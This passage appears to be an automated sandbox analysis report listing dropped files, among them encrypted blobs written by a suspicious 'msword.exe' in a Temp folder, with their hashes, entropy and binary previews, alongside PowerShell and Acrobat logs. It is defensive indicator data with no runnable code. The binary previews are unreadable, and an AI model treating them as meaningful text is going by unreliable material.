Preview:	.M<..l.v.;. FB.4.h{..I.....jo_..~6s..7..bM.}..V.&.o_Y..k..`.x..q...H....6u.`T."....t.v..D.d\tv..J............{.'....S..)..u.nCb.>.0g.uh'.A4.&#o..J..w...g.......eh.K.z...D)78.6.H.S..aP.]...\|.....f...zDnlM3.......G\.M...3T..Ow.....z-3...Z,..L...k.\@....43.....j... .$r0H........+.....}..o#.h....t.L.U.X.).t....]&..@...I..".it...4..p].F.(,O.".{.>..s-._$...(.%ZKG.o.6xr\|....8.Y...%..J.0.I...P....Io.....1;Z.u..uZ.e..Jr....$.I.{.W..l.....d.@C.`+L. .A.}W..d.X.c..)a.&.P.9 Y....R.R...?o..>......GX.D..i.{.m.?>..<..W+..s8.uK....D...H....Vk.la.X...w..D....t..k.HW....OA....~dU\|^DC....D..>...{.t8,o....l.q.nXu.]=4...K.@[?wpn..nY...Q...A.$..=@G....J.O..H.~..:i....!...w..A=".\|.z.jcm........4T...o.,...c1~..B....Yz...8.5qu.<....H..&....[.n..3.=...-l6Z..s...i,0.......T.{r...F.":. .......j.r-j'3.!....=..iE.oJ.^0;....q/z.]..u"I..X..d..m..Z..L...x....<..g.$...s.*......)..[G.......6.".....f.5.@{..!.+j..yf..iz...=...V.d........6...k.uE]6....Q...mV.i.FU.......v.w..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Substantial

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	58368
Entropy (8bit):	7.996685518527556
Encrypted:	true
SSDEEP:	1536:Kftiu0ideTjMGF6+YCYNRbYPUU1gqE1oe6kWjlu:958eTN6rCeYPz1gMeClu
MD5:	734A793F9424DE731EEE480B610E0257
SHA1:	DD2073F71258FC036517ED503B3F85FD8ECDFDA6
SHA-256:	0915FFDD69CF4511B586769737D54C9FF5B53EDA730ECA7A4C15C5FF709315EC
SHA-512:	194915FEEFA2E7D04F0683FD5AF0F37FC550F1A8F4883D80D4CE0E4B6E4091BD9049A52E0FB3E5D3DB872B711431E1D5E7800AA206E3B5654DFD1266FB452335
Malicious:	false
Preview:	\|U.A&..).?.<.`...D0.3.!=H..Id.,....@r...X...{P.@O.^.G..i.N.d.;k.GjcuuwC.h....E%t.Z..:...T:.s"..',...<.."(._.zk`..\|.U.........L]....{.:.4.....z.!...<..m.3.3..lK..E.u..-..#S.l8.F.G.....B .h.v..99.6P;..a..O.T..eK...q.j:.4...F\B>c.>r{...4..&U......./.qH...@..U..>...6.B...(d.8......`.L.N......r4.e...fp..X.....w....[K.g.\|....om.,.z.Q...fdC..s..n.h...{F.h...,.j].z..?.^.Y.::.-+8....}W.....m..h.Q..Vo..1.g....M......i...R.v3.i29jdc...3\[:..r@.TbPN....pL..Xc.6/T..v..n_..0[........o....TE.`S...N....Kj6hamK...o.0_.H$..... .!a..?u.;.=..C..xp..[.s........O..b.H\|....96h..V....??%......9.8.)..*.4L..J..R...9%..O.'..O= a.6..K.o.......}..F....M5e.....8.p.....kqq...eL.u%.....6.66M'n.Uz.....(...?vz.,.2VB'.....:h.#o.8..~..@.6.?m..5.....8....pFX$..M8.%q......`s...y.Nudh.........R...9W[..>%.6O.X.....G.....@...$../.<j.t2.O@r..x.{._.....c!....d%.".y....I.8I./........'q.F....@.+..h..c....j.x.m..M.q.).].c......q.o...ahn..c.-a......Y..+^.G....@.8.....;H..X..t

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Undefined

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	67584
Entropy (8bit):	7.996945320826708
Encrypted:	true
SSDEEP:	1536:9bqjXKdCr6Qw/ljXmAZUNbHaQPc0osgAuB6mrQjh4GVnY4t8PwMU:9OadCretrniNX1osgAGrQh4GVY4ePwMU
MD5:	10CF860D6ED7F8B77D7F02A407DDDE2C
SHA1:	42C54FF8B32BD09B583E544837A65248AF7B60AB
SHA-256:	A4E09DE3E94F24B4D2D780667569166F242486A7912706A58AB32CF88F547069
SHA-512:	355179700261EE76D67CEFCC27A120CA636278636420DF8D5CCE965055CC05F5249F86230A4C1695FCD3DB4A9B91CFD0D1AF5E6723F3A9B396DB1F4B70EC0052
Malicious:	false
Preview:	>.m....\qG..........h......y(..].....b8.Bt>f)iW/m..'...=.~Z......?......n.'..1M..w.D.9. .u.y.Ta+...$..Q.v..8........O..X..K.W.....x.".E.."g....9.fk.#.=.....:.OB..7..Tf.4...1AK..}..Y..?..)...V..Jr.v...9...!.2..i.B.!....ji..&.e...Q...;..k..U11.ov..I.....{q.\.T&.#..r.9.(v-r../....}.T......f..J..%.\|u...A..&...S[s....4.j$P..PV..M..s.739$...}..W{.f..&....A..h.....Ye.v......!.+.F.E.1.e...c.....i....D..n.&..g.d....Hx\....b.......N..0.^..O...@j....'..Z.~......w}....g...c....V..b......t..%.....].`@e.`...._......vX.A._....?...Pp.DG.7m.R..4G3@....uy...;L'..II{....M...Fv.[..<.Vm".....P.w.\......%.kY.^.L[..h.s..`..E.>....g..^.. 8...#.[HY@.8.......N.7...m....T...<."}H..3.!.9N$..,.bF.@.......nkP.8.R.-J.~K..<.,...f.vL..........YPA...LHl5\..H....c..G."h..s..X..X.......8...U....,..s`.i......E...o.C'.&+.Lb.&......[t1..>..`t......&`CE.9=..m4..3f\|.Y@X..,.u.C.o~....L.E....2.K..}..;....e....w...U...L...7#.\|..`5g.x<....../.]^.j.,y.#W.....B\.y

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	21979
Entropy (8bit):	5.049158677118914
Encrypted:	false
SSDEEP:	384:aPVoGIpN6KQkj2qkjh4iUxehQVlardFWgxOdB2tAHkDNXp5pNSSme+vOjJiYo0ik:aPV3IpNBQkj2Ph4iUxehYlardFWgxOdm
MD5:	E85ADBB7806D6C2B446681F25E86C54E
SHA1:	7945DA1DD2CC4F96AD9DD6E40803842C3497B0C0
SHA-256:	1DE8C1E231A1C77FB42123C0362070540F9692F0A3E4EA5141C6F8EE8DE8EBF5
SHA-512:	D60A6998458E9D2FB6F6345306DA7CB679E8A8202270B1C31519FFD017C102D7B46A7FD98011577784E2ADA33C0FCCA138EA1BB68C4260E45FA3BAFC307A60D3
Malicious:	false
Preview:	PSMODULECACHE.......CB.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem...............?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet..........?T.z..C...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1........Register-IscsiSession........New-IscsiTargetPortal........Get-IscsiTarget........Connect-IscsiTarget........Get-IscsiConnection........Get-IscsiSession........Remove-IscsiTargetPortal.....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\MSIe9eb7.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.4965336456103326
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8yQpClUH:Qw946cPbiOxDlbYnuRKTWb
MD5:	ED50ACF9D6CE6546AE3EB5898A4A7756
SHA1:	DB2D9A408D7536DDBA3AE71963FA232342E23EEF
SHA-256:	59C40FB3D44C0DF49D5974E05C8AAB1BFEB8FE709C1DE53B0051088AB242477C
SHA-512:	00586966D1ED1F71A6405EDFB11945F498DB96C113D6491990AFCD4EB830D95AE20F02401F767A0719F015B7EB9AE3115BE5F24E18D22B8F782ED176AC9D9C19
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.7./.0.1./.2.0.2.5. . .0.0.:.2.3.:.1.1. .=.=.=.....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3wt3axdy.fgm.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_celqzgn5.3ch.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dn0oyrxk.e0x.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kkxvdhjw.z10.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p25rfhi4.pye.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rcco13mo.uzq.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u5rwahsx.eyw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yic2ovmf.m41.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-07 00-23-05-872.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.345946398610936
Encrypted:	false
SSDEEP:	384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
MD5:	8947C10F5AB6CFFFAE64BCA79B5A0BE3
SHA1:	70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
SHA-256:	4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
SHA-512:	B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
Malicious:	false
Preview:	SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393), with CRLF line terminators
Category:	dropped
Size (bytes):	15114
Entropy (8bit):	5.352599160066827
Encrypted:	false
SSDEEP:	384:YvzarPfO77k0ZAidKzzkukR0UbYm78sCQPPTphxiVIn4WRjgXGOwk9kN8Nv0Y9Fc:EdT
MD5:	A23C2AE7ECE252A25C3A1766D3D7CC00
SHA1:	EAE333FC422E3ED873CA64ABA0FE36C5895E1691
SHA-256:	53787949215960041D0C420AC592830D671675B53725643B3EAEF0E37B82E6ED
SHA-512:	C7FA36483B9CB4CC1C60788E7A18E305A7D7EBAF8BB97E9D4C3DD2CFDB72C6BAC1A96F74991B8C53BFDE9675647851ADB2A7A804FF72D308381EA8C912B965E1
Malicious:	false
Preview:	SessionID=8b4aef9e-da16-4a8f-aaac-294c135d0360.1736227385917 Timestamp=2025-01-07T00:23:05:917-0500 ThreadID=8092 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=8b4aef9e-da16-4a8f-aaac-294c135d0360.1736227385917 Timestamp=2025-01-07T00:23:05:918-0500 ThreadID=8092 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=8b4aef9e-da16-4a8f-aaac-294c135d0360.1736227385917 Timestamp=2025-01-07T00:23:05:918-0500 ThreadID=8092 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=8b4aef9e-da16-4a8f-aaac-294c135d0360.1736227385917 Timestamp=2025-01-07T00:23:05:918-0500 ThreadID=8092 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=8b4aef9e-da16-4a8f-aaac-294c135d0360.1736227385917 Timestamp=2025-01-07T00:23:05:918-0500 ThreadID=8092 Component=ngl-lib_NglAppLib Description="SetConf

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29752
Entropy (8bit):	5.38844776568529
Encrypted:	false
SSDEEP:	768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rp:l
MD5:	9CDB375B5C880DA3486C317510F5CF17
SHA1:	A6E26CF4B9CFDFA0717AD956A430C017B62F16AA
SHA-256:	4FFA61918A7828E555272655D51F40E28B1D333558465FA17778CA23DC923E61
SHA-512:	F5A54304FBA6FC7EF7FF948FAA314AE14A2DE2851730E521473EBFA788D5D49D54B1ABD3FBF647DE5E231220C0F6F6027D5F5958C25008CA03E12CAB906B5758
Malicious:	false
Preview:	03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : *************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***********************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-

C:\Users\user\AppData\Local\Temp\acrocef_low\0b32072f-e303-4f7c-8a30-71739014502e.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:	dropped
Size (bytes):	758601
Entropy (8bit):	7.98639316555857
Encrypted:	false
SSDEEP:	12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:	3A49135134665364308390AC398006F1
SHA1:	28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:	BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:	false
Preview:	...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......\|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!\|G.1...... .3.`./....`~......G.............\|..pS.e.C....:o.u_..oi.:..\|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

C:\Users\user\AppData\Local\Temp\acrocef_low\4077a668-c655-4cde-b1e3-76b399f0fb2a.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57837
Category:	dropped
Size (bytes):	1419751
Entropy (8bit):	7.976496077007677
Encrypted:	false
SSDEEP:	24576:/xTwYIGNPgeWL07oYGZSdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07c:JTwZG/WLxYGZS3mlind9i4ufFXpAXkrj
MD5:	A75FF7DB61C1045883896824BB88C1F2
SHA1:	53319FF7B52C04556428195E0F43504C40132A25
SHA-256:	C34648E193BE7BD40D1F796496710A81EED5E0F41D24B5601BF2F966CBCC5BB7
SHA-512:	6A5A2E0D01BFB72700319B21B5244ED526FFED5A585F46AF16689B05C6CE34C2A8A81E508F331330FB2BF5E848827993A9D147DA06AE03BEABF56AEDCDDB44ED
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\4a9f62d8-80bb-4f19-9e3e-224c49e7af9f.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
Category:	dropped
Size (bytes):	1407294
Entropy (8bit):	7.97605879016224
Encrypted:	false
SSDEEP:	24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
MD5:	A0CFC77914D9BFBDD8BC1B1154A7B364
SHA1:	54962BFDF3797C95DC2A4C8B29E873743811AD30
SHA-256:	81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
SHA-512:	74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\dde9559a-e48b-4198-a38e-c87f695687ad.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Category:	dropped
Size (bytes):	386528
Entropy (8bit):	7.9736851559892425
Encrypted:	false
